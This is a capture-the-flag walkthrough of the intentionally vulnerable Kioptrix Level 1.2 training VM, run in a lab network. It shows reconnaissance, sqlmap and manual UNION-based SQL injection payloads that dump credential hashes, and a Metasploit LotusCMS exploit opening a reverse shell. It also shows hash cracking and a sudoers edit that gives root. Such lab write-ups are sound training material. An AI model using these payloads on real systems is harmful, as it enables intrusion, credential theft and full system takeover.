Part 3 of the Kioptrix Series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Lets get started!!
Description from author:
It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.
After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
Under Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Starting the pentest
Kali Linux machine
Using the tool netdiscover, I found the victim VM to be 192.168.182.153
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
Scanning and Reconnaissance
Running a scan with nmap I found OpenSSH 4.7p1 Debian 8ubuntu1.2 is running on port 22/tcp, and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) is running on port 80/tcp. Also, the Vm’s OS isLinux 2.6.X . I can probably guess from nmap that we will being some web exploitation.
root@kali:~# nmap -A -T4 192.168.182.153 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST Nmap scan report for kioptrix3.com (192.168.182.153) Host is up (0.00027s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:58:63:15 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.27 ms kioptrix3.com (192.168.182.153) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds root@kali:~#
Running Nikto, i ccould see that the web server is running phpadmin, which is a free software tool written in PHP, intended to handle the administration of MySQL over the Web (I smell an SQL injection later in the pentest).
root@kali:~# nikto -host http://192.168.182.153/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.182.153 + Target Hostname: 192.168.182.153 + Target Port: 80 + Start Time: 2017-03-02 00:24:51 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Cookie PHPSESSID created without the httponly flag + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current. + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 14:22:00 2009 + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 7534 requests: 0 error(s) and 19 item(s) reported on remote host + End Time: 2017-03-02 00:25:05 (GMT-6) (14 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
I first went to the site and found out it was a blog. I already knew it had phpmyadmin because of the nikto scan, but I also found out it had a gallery.
After doing some browsing on the site, I found by going to “Ligoat Press Room” and by clicking on sorting options and photo id, I found that URL had a parameter of “id” which could signify a vulnerability to SQL injection. After putting
php?id=1 , the server gave us an SQL error. This site is vulnerable to a SQL injection!!
Last thing I did was check the login portal on blog site and found that it was using LotusCMS which is vulnerable to LotusCMS 3.0 eval() Remote Command Execution exploit.
The exploitation will be separated into 3 categories. The first will be doing a SQL injection with sqlmap, the second doing a SQL injection manually, and lastly, doing the LotusCMS 3.0 eval() Remote Command Execution Exploit. All 3 will produce the same results by getting the user credentials to the vulnerable vm (which will then be used to perform privilege escalation to get root).
SQLi using sqlmap
I will NOT be putting all the output from sqlmap! I did not want to dump so much info so i just showed the commands used and the important output. Just fyi! So now knowing that the web server is vulnerable to an SQL injection, I fired up sqlmap and ran the command below to enumerate DBMS databases.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs
Well 3 databases were available! I used the next command to see the tables on the gallery database.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
Now we see 7 tables in the gallery database. Dev_accounts looks very interesting so lets dump all the database table entries and see what we find using the command below.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
From the tables we can see that we got the username and password hashes for dreg and loneferret. We can ssh into the victim’s machine using these credentials but after we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” if you want unless you want to learn the other methods I used to get the passwords)
So now I will be doing a SQL injection but manually instead of using sqlmap. I used a tutorial which greatly helped me out which I recommend to you all called Hacking website using SQL Injection -step by step guide. If you have any questions to how and why I used a certain SQL statement just go to that tutorial which explains more in detail or just leave me comment.
So with that covered, lets get started! We know from checking the site earlier, that it is vulnerable to an SQL injection so what I want to know next is how many columns are listed in the database and as well which columns are vulnerable. I will use the command listed below for to get this information. NOTE: Make sure to put this after the id parameter in the URL.
-1 union select 1,2,3,4,5,6--
From the output we can tell that it has 6 columns with column 2 and column 3 being vulnerable(if you want to know more on how I got this, click on the link stated earlier). Next, I will try to find the version of the database. Since we knew that column 2 is vulnerable, we will be injecting our code into that column. I will use command listed below to show exactly how its done!
-1 union select 1,version(),3,4,5,6--
SQL 5.0.51a is a version of MySQL. We now know what type of syntax the database uses. Now we need to find what tables are located in the database and their names. We will inject using the query listed below.
-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Sweet! We have all the tables on the database so lets check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: The CHAR() portion of the query is the name of dev_accounts. We used the tool hackbar to do the conversion so we can get the query to work.
-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--
Almost done! Lets get the database to give us the username and password using the injection query below.
-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--
Bingo!! We got username and password hashes to dreg and loneferret. Now onto password cracking. (You can skip the next exploit if you want to continue on in the pentest or check out the Lotus exploit to see another way of exploiting this VM)
LotusCMS 3.0 eval() Remote Command Execution Exploit
I will use a metasploit module to for the LotusCMS 3.0 eval() Remote Command Execution exploit so we can get a shell.
msf > use exploit/multi/http/lcms_php_exec msf exploit(lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port URI /lcms/ yes URI VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf exploit(lcms_php_exec) > set RHOST 192.168.182.153 RHOST => 192.168.182.153 msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp payload => generic/shell_reverse_tcp msf exploit(lcms_php_exec) > set LHOST 192.168.182.147 LHOST => 192.168.182.147 msf exploit(lcms_php_exec) > set URI / URI => / msf exploit(lcms_php_exec) > exploit [*] Started reverse TCP handler on 192.168.182.147:4444 [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600 whoami www-data
So we have a shell. Lets do some looking around.
pwd /home/www/kioptrix3.com ls -l total 84 drwxrwxrwx 2 root root 4096 Apr 15 2011 cache drwxrwxrwx 8 root root 4096 Apr 14 2011 core drwxrwxrwx 8 root root 4096 Apr 14 2011 data -rw-r--r-- 1 root root 23126 Jun 5 2009 favicon.ico drwxr-xr-x 7 root root 4096 Apr 14 2011 gallery -rw-r--r-- 1 root root 26430 Jan 21 2007 gnu-lgpl.txt -rw-r--r-- 1 root root 399 Feb 23 2011 index.php drwxrwxrwx 10 root root 4096 Apr 14 2011 modules drwxrwxrwx 3 root root 4096 Apr 14 2011 style -rw-r--r-- 1 root root 243 Aug 5 2010 update.php
The gallery directory looks interesting. Lets see what’s in there.
ls -l gallery total 156 drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK -rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql -rw-r--r-- 1 root root 252 Apr 12 2011 g.php drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin -rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php -rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php -rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php -rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php -rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php -rw-r--r-- 1 root root 249 Apr 12 2011 index.php -rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK -rw-r--r-- 1 root root 212 Apr 12 2011 login.php -rw-r--r-- 1 root root 213 Apr 12 2011 logout.php -rw-r--r-- 1 root root 249 Apr 12 2011 p.php drwxrwxrwx 2 root root 4096 Apr 12 2011 photos -rw-r--r-- 1 root root 213 Apr 12 2011 photos.php -rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php -rw-r--r-- 1 root root 214 Apr 12 2011 profile.php -rw-r--r-- 1 root root 87 Oct 10 2009 readme.html -rw-r--r-- 1 root root 213 Apr 12 2011 recent.php -rw-r--r-- 1 root root 215 Apr 12 2011 register.php drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin -rw-r--r-- 1 root root 213 Apr 12 2011 search.php -rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php -rw-r--r-- 1 root root 211 Apr 12 2011 tags.php drwxr-xr-x 6 root root 4096 Apr 12 2011 themes -rw-r--r-- 1 root root 56 Oct 10 2009 version.txt -rw-r--r-- 1 root root 211 Apr 12 2011 vote.php
I snooped around until i found in the gconfig.php file what we were looking for! I got the phpmyadmin credientials!
$GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
I input the credentials to get into the phpmyadmin application.
I then go to the gallery database. Then click on the SQL tab and enter the SQL query below.
SELECT * FROM dev_accounts
We Now have the usernames and password hashes for dreg and loneferret!
Password Cracking using hashcat
With the two passwords stored in hashes.txt I started up hashcat in order to break the passwords. The command to break the passwords is listed below.
root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
We found that passwords were starwars and Mast3r!
Persistance(Linux Privilege Escalation)
Lets ssh into the victim’s VM using loneferret account.
root@kali:~# ssh email@example.com The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established. RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts. firstname.lastname@example.org's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$
Lets check the the CompanyPolicy.README file. That looks interesting! I also ran sudo -l and whereis ht commands to see some additional info.
loneferret@Kioptrix3:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO loneferret@Kioptrix3:~$ loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ loneferret@Kioptrix3:~$ whereis ht ht: /usr/local/bin/ht loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht -rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht loneferret@Kioptrix3:~$
Found a SUID binary! So this means as our current user loneferret , we can run the ht editor as sudo and edit any file we want! Lets edit the /etc/sudoers file then! Use the commmand listed below to get into the ht text editor. Once you run the command then press F3 and then add /etc/sudoers.
loneferret@Kioptrix3:~$ sudo ht
Ok once we are in the /etc/sudoers file add /bin/sh at the end where loneferret entry is at. Then press ALT+F to save and then CTRL+Z to exit.
Now run the following for root access sudo /bin/sh
loneferret@Kioptrix3:~$ sudo /bin/sh # id uid=0(root) gid=0(root) groups=0(root) # whoami root # hostname Kioptrix3
This was hard compared to the first two and took me awhile to get root access. Took some basic SQL knowledge as well as some basic linux privilege techniques to do but I got it done. If you have any feedback you want to give, give a comment below. Well it just gets harder from here. On to the next one!